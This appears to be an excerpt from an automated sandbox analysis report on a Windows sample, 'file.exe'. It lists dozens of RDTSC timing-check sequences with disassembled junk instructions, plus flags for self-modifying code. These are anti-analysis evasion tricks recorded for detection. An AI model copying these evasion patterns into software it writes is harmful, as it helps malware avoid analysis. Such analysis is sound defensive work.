    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406811 second address: 406818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406818 second address: 40681D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40681D second address: 406827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406995 second address: 4069BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007F18F0EA3E4Ch 0x0000000b jg 00007F18F0EA3E46h 0x00000011 pop edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F18F0EA3E53h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406C65 second address: 406C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406C6B second address: 406C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406C74 second address: 406C7E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F18F0E36A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406DFD second address: 406E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406E01 second address: 406E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406F2A second address: 406F37 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F18F0EA3E48h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406F37 second address: 406F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F18F0E36A46h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jc 00007F18F0E36A46h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a js 00007F18F0E36A46h 0x00000020 jns 00007F18F0E36A46h 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406F62 second address: 406F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406F66 second address: 406F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406F6C second address: 406F72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406F72 second address: 406F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406F76 second address: 406F8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0EA3E52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40BA2A second address: 40BA34 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40BA34 second address: 40BA3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4148E5 second address: 414912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007F18F0E36A46h 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007F18F0E36A55h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 414D43 second address: 414D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F18F0EA3E46h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F18F0EA3E4Fh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 414FB5 second address: 414FC9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F18F0E36A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jno 00007F18F0E36A46h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4152B4 second address: 4152D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F18F0EA3E4Ch 0x0000000d pushad 0x0000000e jmp 00007F18F0EA3E4Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4152D6 second address: 4152DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4152DD second address: 4152E2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4159BD second address: 4159C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4159C3 second address: 4159C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 414060 second address: 41406A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F18F0E36A46h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41E6F2 second address: 41E704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F18F0EA3E46h 0x0000000a jnc 00007F18F0EA3E46h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41E2CF second address: 41E2E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F18F0E36A4Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41E2E4 second address: 41E2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F18F0EA3E46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41E2F7 second address: 41E307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F18F0E36A46h 0x0000000a jnl 00007F18F0E36A46h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41E460 second address: 41E464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 421688 second address: 42168C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42168C second address: 4216A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F18F0EA3E4Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F18F0EA3E5Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4301CE second address: 4301DE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F18F0E36A4Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4301DE second address: 4301E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42FBDE second address: 42FC0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F18F0E36A54h 0x00000011 push ecx 0x00000012 jmp 00007F18F0E36A4Dh 0x00000017 pop ecx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 432236 second address: 432242 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F18F0EA3E46h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43C650 second address: 43C662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jng 00007F18F0E36A46h 0x0000000b jng 00007F18F0E36A46h 0x00000011 pop ecx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43C662 second address: 43C667 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43C667 second address: 43C69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnl 00007F18F0E36A61h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007F18F0E36A6Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F18F0E36A46h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43C69F second address: 43C6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43C6A3 second address: 43C6AD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F18F0E36A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4444B4 second address: 4444BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4444BA second address: 4444BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4444BE second address: 4444CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F18F0EA3E46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4444CE second address: 4444D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4444D4 second address: 4444D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4444D8 second address: 4444DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44C29A second address: 44C2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 js 00007F18F0EA3E6Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44C2AA second address: 44C2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44C2B0 second address: 44C2BD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F18F0EA3E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44C2BD second address: 44C2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F18F0E36A46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44AFDB second address: 44AFDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44AFDF second address: 44AFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44B103 second address: 44B11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F18F0EA3E46h 0x0000000a jmp 00007F18F0EA3E51h 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44B11F second address: 44B159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F18F0E36A4Eh 0x00000010 push edi 0x00000011 pop edi 0x00000012 jg 00007F18F0E36A46h 0x00000018 push edi 0x00000019 jmp 00007F18F0E36A4Ah 0x0000001e jnc 00007F18F0E36A46h 0x00000024 pop edi 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44B430 second address: 44B434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44B434 second address: 44B445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F18F0E36A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44BF8C second address: 44BF90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44BF90 second address: 44BF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F18F0E36A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 450A8D second address: 450AAB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F18F0EA3E46h 0x00000008 jmp 00007F18F0EA3E50h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 460626 second address: 460658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F18F0E36A4Ah 0x0000000e jmp 00007F18F0E36A57h 0x00000013 jnc 00007F18F0E36A46h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 460658 second address: 460671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F18F0EA3E51h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 461EE9 second address: 461EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45CDED second address: 45CDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45CDF1 second address: 45CDF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45CDF5 second address: 45CDFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45CDFB second address: 45CE0D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F18F0E36A4Ch 0x00000008 ja 00007F18F0E36A46h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45CE0D second address: 45CE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F18F0EA3E58h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47046A second address: 4704B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F18F0E36A56h 0x0000000f jmp 00007F18F0E36A4Dh 0x00000014 pop ebx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007F18F0E36A48h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487CDD second address: 487CE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487CE3 second address: 487CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48810F second address: 488115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488115 second address: 488132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 js 00007F18F0E36A46h 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F18F0E36A4Ch 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488132 second address: 48814F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F18F0EA3E59h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488535 second address: 48853D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48853D second address: 488546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CBA6 second address: 48CBAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CBAC second address: 48CBB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CBB0 second address: 48CBB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CE3E second address: 48CE42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48D17F second address: 48D1D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or edx, dword ptr [ebp+12453150h] 0x00000012 push dword ptr [ebp+124542D6h] 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F18F0E36A48h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 or dl, FFFFFF9Fh 0x00000035 jg 00007F18F0E36A4Ah 0x0000003b mov dx, B3BBh 0x0000003f push 2BED8666h 0x00000044 pushad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48D1D1 second address: 48D1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F18F0EA3E46h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48D1DE second address: 48D1E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48EA36 second address: 48EA3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E61A second address: 48E61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4E86 second address: 3A4E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4E8A second address: 3A4E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4E8E second address: 3A4E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4E94 second address: 3A4EC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jmp 00007F18F0E36A58h 0x00000012 pop edi 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4EC2 second address: 3A4EC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0388 second address: 4AA03EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F18F0E36A4Fh 0x00000009 add eax, 1AA5601Eh 0x0000000f jmp 00007F18F0E36A59h 0x00000014 popfd 0x00000015 mov cx, 65E7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007F18F0E36A56h 0x00000027 adc si, A548h 0x0000002c jmp 00007F18F0E36A4Bh 0x00000031 popfd 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA03EF second address: 4AA03F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA03F3 second address: 4AA042D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F18F0E36A56h 0x0000000b call 00007F18F0E36A52h 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 popad 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA042D second address: 4AA0431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0431 second address: 4AA0437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0437 second address: 4AA044C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F18F0EA3E51h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA044C second address: 4AA0450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 39A419 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3BD5EC instructions caused by: Self-modifying code
